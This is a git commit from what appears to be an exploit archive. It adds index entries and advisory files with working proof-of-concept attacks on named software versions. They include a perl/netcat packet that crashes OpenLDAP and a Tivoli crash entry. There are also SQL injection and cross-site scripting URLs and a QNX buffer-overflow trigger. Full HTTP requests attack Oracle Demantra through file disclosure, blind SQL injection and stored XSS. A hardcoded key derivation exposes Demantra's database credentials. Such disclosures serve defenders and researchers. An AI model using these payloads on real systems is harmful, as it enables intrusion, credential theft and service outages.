Updated 03_03_2014

This commit is contained in:
Offensive Security 2014-03-03 04:30:50 +00:00
parent d02449c714
commit b3951809b4
15 changed files with 450 additions and 0 deletions

View file

@ -28769,3 +28769,17 @@ id,file,description,date,author,platform,type,port
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
31995,platforms/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080
31996,platforms/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 Frame Location Cross Domain Security Bypass Vulnerability",2008-06-27,"Eduardo Vela",windows,remote,0
31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 'LIST' Command Directory Traversal Vulnerability",2008-06-27,"Tan Chew Keong",windows,remote,0
31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability",2008-06-30,anonymous,multiple,dos,0
32000,platforms/linux/dos/32000.txt,"OpenLDAP <= 2.3.41 BER Decoding Remote Denial of Service Vulnerability",2008-06-30,"Cameron Hotchkies",linux,dos,0
32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0
32004,platforms/php/webapps/32004.txt,"FaName 1.0 index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 'phgrafx' Local Buffer Overflow Vulnerability",2008-07-01,"Filipe Balestra",unix,dos,0

Can't render this file because it is too large.

10
platforms/linux/dos/32000.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30013/info
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users by crashing affected servers.
OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected.
slapd -h ldap:// -d511 &
perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389

View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/30010/info
IBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error.
An attacker can exploit this issue to crash the affected server with a SIGSEGV fault, denying service to legitimate users.
Tivoli Directory Server 6.1.0.0 - 6.1.0.15 are affected.
The following 'ldapadd' entry is sufficient to trigger the issue:
dn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies
globalGroupName: GlobalAdminGroup
objectclass: top
objectclass: ibm-globalAdminGroup

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30016/info
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=[SQL injection]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30016/info
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/fonctions/supprimer_tag.php?IdTag=[SQL injection]

10
platforms/php/webapps/32003.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30016/info
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=5
http://www.example.com/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30019/info
FaName is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
FaName 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> http://www.example.com/[FANAME-DIRECTORY]/index.php?desc="><script>alert(document.cookies)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30019/info
FaName is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
FaName 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[FANAME-DIRECTORY]/page.php?name=<script>alert(document.cookies)</script>

14
platforms/unix/dos/32009.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/30024/info
QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.
Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.
QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx

View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29986/info
Microsoft Internet Explorer is prone to a cross-domain scripting security-bypass vulnerability because the application fails to properly enforce the same-origin policy.
An attacker can exploit this issue to change the location of a frame from a different domain. This allows the attacker to execute arbitrary code in a frame of the same window as content from a different domain. Successful exploits will allow the attacker to access information from the parent document via DOM components that are not domain-reliant (such as the 'onmousedown' event).
Internet Explorer 6, 7, and 8 Beta 1 are vulnerable; other versions may also be affected.
javascript:x=open('http://example.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return
.http://www.example2.com/somescript.html.;}}}catch(e){}},5000);void(1);

View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29989/info
AceFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
AceFTP Freeware 3.80.3 and AceFTP Freeware 3.80.3 are vulnerable; other versions may also be affected.
Response to LIST:
/../../../../../../../../../testfile.txt\r\n

View file

@ -0,0 +1,72 @@
Details:
The Team discovered a Local File Include (LFI) vulnerability. A file inclusion vulnerability occurs when a file from the target system is injected into a page on the attacked server page.
The vulnerable page is:
* /demantra/GraphServlet
Impact:
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
- Harvest useful information from the web.xml configuration file.
- Download the whole web application source code like the vulnerable page itself.
Exploit:
Request:
POST /demantra/GraphServlet HTTP/1.1
Host: 192.168.14.171:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/png
Content-Length: 44378
Date: Fri, 02 Aug 2013 20:20:58 GMT
<?xml version="1.0" encoding="UTF-8"?>
<web-app
id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<!-- Important Notice -->
<!--
The order of elements in the web.xml is significant for some
Application Server parsers like WebSphere. The expected order is
examplified in the comments of this file. Each element section has a
Start comment(***) and an End comment. Please make sure to add new
elements in the appropriate section of the file delimited by the
relevant comment.
-->
<!-- ***Icons Start -->
<!-- ***Icons End -->
-snip-?
Copyright:
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

View file

@ -0,0 +1,71 @@
Details:
Application is vulnerable to SQL injection.
Impact:
An attacker with access to the vulnerable pages could manipulate the queries being sent to the database, potentially enabling them to:
- Extract sensitive information, including (but not limited to) authentication credentials and personal details. Such information could be sold by the attacker to other malicious individuals, used in other attacks (as the same password is often used across systems) or released publicly to damage the organisations reputation.
- Modify content within the application. If this was possible, the attacker could add malicious code to the application, which could then be used to deliver malware or exploit issues within client browsers.
In this particular instance, exploitation was more difficult as the results of the attack had to inferred based on the pages returned, often referred to as “blind” SQL Injection. This does not prevent exploitation, it simply means that the methods required to perform this attack require a very large number of requests to be made. However, because of this it is potentially easier to identify that an attack using this method is being attempted.
Exploit:
POST /demantra/portal/editExecDefinition.jsp HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=
Related Error Log Entry:
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:
[error occurred during batching: ORA-01756: quoted string not properly terminated]
UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3
WHERE EXEC_ID = 5
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
Sample Request #2:
POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on
Related Error Log Entry:
… 39 more
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:
[error occurred during batching: ORA-00933: SQL command not properly ended]
UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
Copyright:
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

View file

@ -0,0 +1,146 @@
Details:
The TaskSender area is vulnerable to a stored cross-site scripting vulnerability.
Impact:
An attacker could exploit this flaw to get active HTML or script code executed in an authenticated users browser. Cross-site Scripting may be used to perform attacks such as session hijacking by invoking the users browser to send information stored in their cookies (such as a session identification token) to an arbitrary location controlled by the attacker. Furnished with this information the attacker could immediately access the site, masquerading as the authenticated user who viewed the page containing the malicious code. The attacker would then be able to perform actions as the authorised user, subject to their role, which could include viewing sensitive data, modifying profile information and making transactions.
This vulnerability could also be leveraged in a “phishing” attack, whereby the attacker adds additional HTML code to create a false login page within the vulnerable page, which posts the data to a server controlled by the attacker. The attacker could then redirect the user back to the original server, thus giving the illusion that the login was secure and genuine. This could also be achieved by redirecting the user to a false login page on the attackers server rather than adding the code to a page that already exists. This is critical, because if the attacker could host a “phishing” website in a domain with a valid SSL certificate, there would be no way for a user to spot the attack.
A variation of the “phishing” attack described above would be to inject code to completely rewrite the genuine page, defacing the site and possibly having a detrimental impact on the reputation of the company.
Finally, an attacker could use Cross-site Scripting to exploit vulnerabilities within web browsers. The outcome of such an attack would depend on the exploits used, but in a worst case scenario the attacker could gain full control of a users computer. Once that had been achieved it would be trivial for the attacker to install a keystroke logger and gain access to applications via the usernames and passwords they had acquired.
In the case of the current web application, the Cross-site Scripting was “reflective”, meaning that a user would need to follow a specially crafted link for the attack to be successful.
Exploit:
Request:
POST /demantra/TaskSender HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291
Content-Length: 3093
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUsersVector"
389
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUserList"
389;
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="message"
asdasda
----------97315614820331578362291
Content-Disposition: form-data; name="description"
asdasdasdas
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="url"
aaa"onmouseover="alert(document.cookie)
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmail"
1
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTimeHours"
14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTimeHours"
08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_escalateUserList"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="combination"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="tkn"
187120466014305
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedDueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTimeHours"
14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedAlertTime"
08/02/2013
---------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTimeHours"
08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="escalateUserList"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmailCheckbox"
on
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="x"
50
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="y"
7
-----------------------------12454397315614820331578362291--
Resulting Code in page:
<!-- Message -->
<td class="columnCellMessage">
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">
<b>asdasda</b>
Copyright:
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

View file

@ -0,0 +1,41 @@
Details:
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
The target URL is:
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
Now the UAK key is calculated statically:
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
StringBuffer tmp = new StringBuffer("sge");
tmp.append(0);
tmp.append(encryptedPassword);
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
From that information it is possible to create a simple extractor:
pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1
Together with the authentication bypass this can be exploited unauthenticated as well.
Copyright:
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.